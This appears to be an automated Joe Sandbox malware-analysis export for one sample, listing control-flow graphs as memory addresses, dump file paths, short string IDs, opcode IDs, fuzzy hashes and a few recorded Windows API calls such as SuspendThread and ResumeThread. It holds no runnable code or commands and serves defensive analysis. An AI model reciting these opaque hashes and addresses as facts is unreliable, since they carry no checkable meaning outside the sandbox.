                                                    execution_graph 22074 7ffaac8001a9 22075 7ffaac8001b7 CloseHandle 22074->22075 22077 7ffaac800294 22075->22077 22078 7ffaac801e35 22079 7ffaac801e4f GetFileAttributesW 22078->22079 22081 7ffaac801f15 22079->22081 22066 7ffaac800040 22067 7ffaac80007b ResumeThread 22066->22067 22069 7ffaac800154 22067->22069 22070 7ffaac7fe84d 22071 7ffaac7fe85b SuspendThread 22070->22071 22073 7ffaac7fe934 22071->22073

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffaacda194f-7ffaacda1962 1 7ffaacda1964-7ffaacda1ca5 0->1 2 7ffaacda19ae-7ffaacda19c4 0->2 8 7ffaacda1caf-7ffaacda1cee 1->8 4 7ffaacda1a54-7ffaacda1a84 2->4 5 7ffaacda19ca-7ffaacda19d2 2->5 16 7ffaacda1a8a-7ffaacda1a8b 4->16 17 7ffaacda1b2e-7ffaacda1b37 4->17 7 7ffaacda19d8-7ffaacda19ea 5->7 5->8 7->8 9 7ffaacda19f0-7ffaacda1a07 7->9 20 7ffaacda1cf0 8->20 10 7ffaacda1a47-7ffaacda1a4e 9->10 11 7ffaacda1a09-7ffaacda1a10 9->11 10->4 10->5 11->8 14 7ffaacda1a16-7ffaacda1a44 11->14 14->10 21 7ffaacda1a8e-7ffaacda1aa4 16->21 18 7ffaacda1b3d-7ffaacda1b43 17->18 19 7ffaacda1c6f-7ffaacda1c7d 17->19 18->8 22 7ffaacda1b49-7ffaacda1b58 18->22 24 7ffaacda1c84-7ffaacda1c95 19->24 25 7ffaacda1c7f 19->25 30 7ffaacda1cfb-7ffaacda1d91 20->30 21->8 23 7ffaacda1aaa-7ffaacda1ace 21->23 26 7ffaacda1c62-7ffaacda1c69 22->26 27 7ffaacda1b5e-7ffaacda1b65 22->27 28 7ffaacda1b21-7ffaacda1b28 23->28 29 7ffaacda1ad0-7ffaacda1af3 23->29 25->24 26->18 26->19 27->8 32 7ffaacda1b6b-7ffaacda1b75 27->32 28->17 28->21 29->8 38 7ffaacda1af9-7ffaacda1b1f 29->38 35 7ffaacda1d16-7ffaacda1d96 30->35 36 7ffaacda1d9c-7ffaacda1ddf 30->36 37 7ffaacda1b7c-7ffaacda1b87 32->37 35->36 46 7ffaacda1d38-7ffaacda1d98 35->46 49 7ffaacda1de1-7ffaacda1e36 36->49 40 7ffaacda1bc6-7ffaacda1bd5 37->40 41 7ffaacda1b89-7ffaacda1ba0 37->41 38->28 38->29 40->8 42 7ffaacda1bdb-7ffaacda1bff 40->42 41->8 43 7ffaacda1ba6-7ffaacda1bc2 41->43 47 7ffaacda1c02-7ffaacda1c1f 42->47 43->41 48 7ffaacda1bc4 43->48 46->36 57 7ffaacda1d5c-7ffaacda1d9a 46->57 47->8 52 7ffaacda1c25-7ffaacda1c40 47->52 53 7ffaacda1c42-7ffaacda1c58 48->53 63 7ffaacda1e41-7ffaacda1ee7 49->63 52->47 52->53 53->8 55 7ffaacda1c5a-7ffaacda1c5e 53->55 55->26 57->36 62 7ffaacda1d7d-7ffaacda1d90 57->62 75 7ffaacda2017-7ffaacda2034 63->75 76 7ffaacda1eed-7ffaacda2290 63->76 78 7ffaacda203a-7ffaacda203f 75->78 79 7ffaacda2341-7ffaacda23a8 75->79 80 7ffaacda2042-7ffaacda2049 78->80 85 7ffaacda2518 
79->85 81 7ffaacda204b-7ffaacda204f 80->81 82 7ffaacda1fcc-7ffaacda2339 80->82 81->49 84 7ffaacda2055 81->84 82->79 87 7ffaacda20d3-7ffaacda20d6 84->87 85->85 88 7ffaacda20d9-7ffaacda20e0 87->88 89 7ffaacda2057-7ffaacda208c call 7ffaacda1ce0 88->89 90 7ffaacda20e6 88->90 89->79 96 7ffaacda2092-7ffaacda20a2 89->96 92 7ffaacda2156-7ffaacda215d 90->92 94 7ffaacda20e8-7ffaacda211a call 7ffaacda1ce0 92->94 95 7ffaacda215f-7ffaacda21a5 92->95 94->79 103 7ffaacda2120-7ffaacda2148 94->103 109 7ffaacda1f74-7ffaacda1f78 95->109 110 7ffaacda21ab-7ffaacda21b0 95->110 96->49 99 7ffaacda20a8-7ffaacda20c5 96->99 99->79 101 7ffaacda20cb-7ffaacda20d0 99->101 101->87 103->79 104 7ffaacda214e-7ffaacda2153 103->104 104->92 112 7ffaacda1fca 109->112 113 7ffaacda1f7a-7ffaacda2318 109->113 111 7ffaacda2236-7ffaacda223a 110->111 114 7ffaacda21b5-7ffaacda21e4 call 7ffaacda1ce0 111->114 115 7ffaacda2240-7ffaacda2246 111->115 112->80 114->79 119 7ffaacda21ea-7ffaacda21fa 114->119 119->63 120 7ffaacda2200-7ffaacda220f 119->120 120->79 121 7ffaacda2215-7ffaacda2228 120->121 121->88 122 7ffaacda222e-7ffaacda2233 121->122 122->111
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4S$r6S$r6S$r6S
                                                    • API String ID: 0-2602100741
                                                    • Opcode ID: 33398464337195630ef3e3cef2f2c76e748ac04adbb98fcaf4a45693ddb9468b
                                                    • Instruction ID: c9fed6c94fca88f73f26293c6ab62ab63b282118b990f64c520ec6701539976d
                                                    • Opcode Fuzzy Hash: 33398464337195630ef3e3cef2f2c76e748ac04adbb98fcaf4a45693ddb9468b
                                                    • Instruction Fuzzy Hash: 27529F70A19649CFEB5DCF18C4906B977A1FF4A300F5085BDD45ECB286DA38E985CB81

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 172 7ffaac650d68-7ffaac650d7f 173 7ffaac650d81 172->173 174 7ffaac650d82-7ffaac650db9 172->174 173->174 176 7ffaac650dc0-7ffaac650ebe call 7ffaac6507d8 174->176 177 7ffaac650dbb 174->177 193 7ffaac650ec0-7ffaac650f2e 176->193 194 7ffaac650f35-7ffaac650fa3 176->194 177->176 193->194 204 7ffaac650fab-7ffaac65109c 194->204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "9S$b4S$r6S$r6S
                                                    • API String ID: 0-592790241
                                                    • Opcode ID: 356716e6aa7f6ddece2c2816ce6278dab41e54536c0932986be2fb9e194122ff
                                                    • Instruction ID: 90e74c479996b50de4bdcc564c95bbf4a2cd55799c6b71b5853043cdd000c5eb
                                                    • Opcode Fuzzy Hash: 356716e6aa7f6ddece2c2816ce6278dab41e54536c0932986be2fb9e194122ff
                                                    • Instruction Fuzzy Hash: AAA1F4B2908A8D8FE789DB6CC8557AABFE1FB5A310F5041BED04DD72D2CA795805C780
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46ca166f079a9a79aaeae24652216e5fc6552356fd6211503bc927dfc407953c
                                                    • Instruction ID: 7842b96dd7d3bff15ab46a01eb0cdff8d92acbec629b826c8af9b52d54470f3d
                                                    • Opcode Fuzzy Hash: 46ca166f079a9a79aaeae24652216e5fc6552356fd6211503bc927dfc407953c
                                                    • Instruction Fuzzy Hash: 3B323F70A19A8D8FEBB8EF28C855BE937E1FB59301F00416AD84EC7691DF749584CB81
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44fc1109d0b6fc683c0fb902d8ce8843e3bf4aa6ee59698d0976bca7ea81ecd5
                                                    • Instruction ID: d68154014149052725eb04a22faf73c54416dec220e145c5edc272b69930442b
                                                    • Opcode Fuzzy Hash: 44fc1109d0b6fc683c0fb902d8ce8843e3bf4aa6ee59698d0976bca7ea81ecd5
                                                    • Instruction Fuzzy Hash: A5324C70919A8D8FEBB8EF28C855BE937E1FB59301F40412AD84ECB2A1DF749545CB81

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )J_H$XV$p[U$r6S
                                                    • API String ID: 0-4058811649
                                                    • Opcode ID: 6342bbd1479a6ec692d31d47f0b136b007d68217687ca51887770163fefd62b2
                                                    • Instruction ID: e40a6617736cefbc09237484fcca1c2ac8d620a5950198897e9b9426b1da9160
                                                    • Opcode Fuzzy Hash: 6342bbd1479a6ec692d31d47f0b136b007d68217687ca51887770163fefd62b2
                                                    • Instruction Fuzzy Hash: 2EC1DA74A04A1DCFEB98EF68C895BA9B7F1FF59300F5095A9D00DE7291CB34A985CB40

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 211 7ffaacda1202-7ffaacda1209 212 7ffaacda1425-7ffaacda1436 211->212 213 7ffaacda120f-7ffaacda1241 call 7ffaacda0fa0 call 7ffaacda0e70 211->213 214 7ffaacda1438 212->214 215 7ffaacda143d-7ffaacda1448 212->215 213->212 220 7ffaacda1247-7ffaacda1299 call 7ffaacda0fa0 call 7ffaacda0e70 213->220 214->215 220->212 227 7ffaacda129f-7ffaacda12e4 call 7ffaacda0fa0 220->227 233 7ffaacda1354-7ffaacda1390 227->233 234 7ffaacda12e6-7ffaacda12fa call 7ffaacda0e70 227->234 243 7ffaacda13c9-7ffaacda13ce 233->243 234->212 239 7ffaacda1300-7ffaacda1323 call 7ffaacda0fa0 234->239 244 7ffaacda14f5-7ffaacda150c 239->244 245 7ffaacda1329-7ffaacda1339 239->245 248 7ffaacda13d5-7ffaacda13da 243->248 249 7ffaacda150f-7ffaacda151d 244->249 250 7ffaacda150e 244->250 245->244 246 7ffaacda133f-7ffaacda1352 245->246 246->233 246->234 251 7ffaacda1392-7ffaacda13b2 248->251 252 7ffaacda13dc-7ffaacda13de 248->252 254 7ffaacda1525 249->254 255 7ffaacda151f 249->255 250->249 251->244 253 7ffaacda13b8-7ffaacda13c3 251->253 252->212 256 7ffaacda13e0-7ffaacda13e3 252->256 253->243 257 7ffaacda14ab-7ffaacda14bf 253->257 258 7ffaacda1527 254->258 259 7ffaacda1529-7ffaacda1568 254->259 255->254 260 7ffaacda13e5 256->260 261 7ffaacda13e9-7ffaacda1404 256->261 262 7ffaacda14c6-7ffaacda14d1 257->262 263 7ffaacda14c1 257->263 258->259 265 7ffaacda1569 258->265 259->265 267 7ffaacda156a-7ffaacda17aa 259->267 260->261 261->244 264 7ffaacda140a-7ffaacda1423 call 7ffaacda0e70 261->264 263->262 264->212 271 7ffaacda1449-7ffaacda1462 call 7ffaacda0fa0 264->271 265->267 271->244 275 7ffaacda1468-7ffaacda146f 271->275 276 7ffaacda1499-7ffaacda14a1 275->276 277 7ffaacda14a3-7ffaacda14a9 276->277 278 7ffaacda1471-7ffaacda148d 276->278 277->257 280 7ffaacda14d2 277->280 278->244 279 7ffaacda148f-7ffaacda1497 278->279 279->276 280->244
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S$r6S$r6S
                                                    • API String ID: 0-408531346

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4S$r6S$r6S
                                                    • API String ID: 0-515324085

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $r6S
                                                    • API String ID: 0-314325997

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S$r6S
                                                    • API String ID: 0-1821043251

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S$r6S
                                                    • API String ID: 0-1821043251

                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    Control-flow Graph (API call: ResumeThread)
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0

                                                    Control-flow Graph (API call: SuspendThread)
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0

                                                    Control-flow Graph (API call: GetFileAttributesW)
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S
                                                    • API String ID: 0-2983709088

                                                    Control-flow Graph (API call: CloseHandle)
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1735446996.00007FFAAC7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac7f0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7
                                                    • API String ID: 0-1790921346
                                                    • Opcode ID: f66648a39043bab4d50716978014256fd83087011e78503444680a4ae3ae600b
                                                    • Instruction ID: b139e3c5871ede55c5cec893dce4591276101d27d662b6d5047942b712eced1d
                                                    • Opcode Fuzzy Hash: f66648a39043bab4d50716978014256fd83087011e78503444680a4ae3ae600b
                                                    • Instruction Fuzzy Hash: A9D16334A4891C8FDFA9EB18C894FA9B7B5FB68701F5041D9D00EE7660DA71AE85CF40
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 57bb829b95a957284cc105dddc5807a6d59b7a9a252fd84fb5ac9e1dfa7b4bd1
                                                    • Instruction ID: 01b9271ccdcec65e863ea2d0ee640d76979d23a8e0968cd648f13a6de5349b77
                                                    • Opcode Fuzzy Hash: 57bb829b95a957284cc105dddc5807a6d59b7a9a252fd84fb5ac9e1dfa7b4bd1
                                                    • Instruction Fuzzy Hash: A991E531A09E098FFF99EB58D4556A977E1FFAA301B04417ED00ED7292DE24EC468BC0
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dda9ec228b9fcb25b161ff3b17d58ab8f77506db20840037e865fb1f017a22ac
                                                    • Instruction ID: ec4e9c1e12d0a81384a24d3702183bdac55e8cc1218ec5d13e121aadc511cae7
                                                    • Opcode Fuzzy Hash: dda9ec228b9fcb25b161ff3b17d58ab8f77506db20840037e865fb1f017a22ac
                                                    • Instruction Fuzzy Hash: F071A47271DA068FF758AB28D4419B6B3E1FFA9310710817AD09EC3597DE25F8468784
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0981930f774d8f132f0ae2f48543c0b09f697a4b82f2d8f27e461540d6af872b
                                                    • Instruction ID: b070534bceeae9726151f0033161eadf5f3b8776342c4a3e4d76f3ecd9748e46
                                                    • Opcode Fuzzy Hash: 0981930f774d8f132f0ae2f48543c0b09f697a4b82f2d8f27e461540d6af872b
                                                    • Instruction Fuzzy Hash: DA911974908A1D8FDB98DF58C845BE9BBF1FB69310F1082AAD40DE3255CB74A985CF81
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73205b131fc17ee860632ab29b0b5ad893288973ed129144ff6859dedaa8a9ed
                                                    • Instruction ID: 38b42753cf1501ac8607bada6599a566d04d0b57ea730755e0b0aebf8da436d0
                                                    • Opcode Fuzzy Hash: 73205b131fc17ee860632ab29b0b5ad893288973ed129144ff6859dedaa8a9ed
                                                    • Instruction Fuzzy Hash: 07812831A0E642CFF7296B289451579B7E0EF46710B14857ED09FC3193DE28F44A8BD5
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 774404ef22cc926fa6d85a7e8610825704ee5ebc12556546b8ed811133944632
                                                    • Instruction ID: 4b733f99420a40ec053fabddf0fa02e5089b2a5b1304c37721f2116d4da5a90d
                                                    • Opcode Fuzzy Hash: 774404ef22cc926fa6d85a7e8610825704ee5ebc12556546b8ed811133944632
                                                    • Instruction Fuzzy Hash: 7451B372B19A0A8FFB69AB18C440976B3E1FF69310714827AD05EC3697DE34FC468780
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba5ddc768d99d883773b1158692956dfe62f65016f523414ee8b42b5dd3e4f5e
                                                    • Instruction ID: 12a4682e73ed753d64c1b2038b8f843d4bfcc96bc3336d75d1e7a31ec6f7295e
                                                    • Opcode Fuzzy Hash: ba5ddc768d99d883773b1158692956dfe62f65016f523414ee8b42b5dd3e4f5e
                                                    • Instruction Fuzzy Hash: 2D714A729086199FDF44EF68D494EED7BF0FF59324B04517AE449D7262CB24E880CB80
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7a9e6b6880f0739ec2b4967457a39917b22263e0520bad542504d02e607e9ab
                                                    • Instruction ID: d62ffdd8477571212f05cb215cd04d2ae8e483af9989a2e620ede410d739bc20
                                                    • Opcode Fuzzy Hash: d7a9e6b6880f0739ec2b4967457a39917b22263e0520bad542504d02e607e9ab
                                                    • Instruction Fuzzy Hash: E5515B22B0DE4A4FF7A4A72C94556B677E1FF5A35170481BED04EC3297DD19EC0A8380
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e78f68c39b413e48f8e92a8157f2a8c0ee5068d043b57f76874513672324c9a8
                                                    • Instruction ID: 7a3f3ed35ffb4550aeffb96e91fc30b70ca9586e96482215d46232321732252d
                                                    • Opcode Fuzzy Hash: e78f68c39b413e48f8e92a8157f2a8c0ee5068d043b57f76874513672324c9a8
                                                    • Instruction Fuzzy Hash: E851E865A1DB8E9FFF999B3884156B577E1FF56300B4444BED05EC71A3DE28E8048780
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 819537bece8d78ac25ecf67f3ddbff6f10ed0170e295930df3bf42f59e2252a1
                                                    • Instruction ID: ad8aa30040dec2116f5175cf980c9fb826677b20dddf3e88f9a9a39ed04d7717
                                                    • Opcode Fuzzy Hash: 819537bece8d78ac25ecf67f3ddbff6f10ed0170e295930df3bf42f59e2252a1
                                                    • Instruction Fuzzy Hash: CA517E76908A5D8FEB44EFA8D495AEEBBA0FF49314F14457AD04ED7292CF34A841C780
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd072605b47189ceacc6683b9ee0efd52aea9e73b14d90126f6a07f82249e02c
                                                    • Instruction ID: 20ff7d5fd2e928bea22895071ed6de6635b1b72b66943873bb89b54f5482876c
                                                    • Opcode Fuzzy Hash: cd072605b47189ceacc6683b9ee0efd52aea9e73b14d90126f6a07f82249e02c
                                                    • Instruction Fuzzy Hash: EF51D17188E3C54FE7138B305C621E53FB49F13215B1E91EBD488CA4E3D61E569AC3A2
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61a669b6149dacec3bcb7d5e393858febc8b32d7c71d4e21e942777026de27d6
                                                    • Instruction ID: 4ab923e849361290e73dbe3dd75f676cebbfffc8dc1e28eb21a195bbf683074a
                                                    • Opcode Fuzzy Hash: 61a669b6149dacec3bcb7d5e393858febc8b32d7c71d4e21e942777026de27d6
                                                    • Instruction Fuzzy Hash: 72519470A1991D8FDF99EB18C894BE877B1FB69301F5041E9D00EE7691DA31AE85CF40
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2dd2447f6d349089e7d42d4ce41b340faf9111ea1117dff406cd07ae2384411
                                                    • Instruction ID: bf3541f98c3696cf94e623242dc5a023739179b36b738e29f8d92d1aa83ac204
                                                    • Opcode Fuzzy Hash: f2dd2447f6d349089e7d42d4ce41b340faf9111ea1117dff406cd07ae2384411
                                                    • Instruction Fuzzy Hash: 35416E75918A1D9FEB84EFA8D495AEDB7E1FF58311F10417AE40ED3292CF34A8418B80
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5353ca27da670a0163ef269fad2ec8f68e17442ff85a5ab27d11f9eb0bc0f1c3
                                                    • Instruction ID: e9606c64fb6b195fc0edfa24b056e7c1bcae3a361f6d52df39f7beb8fcf3b65e
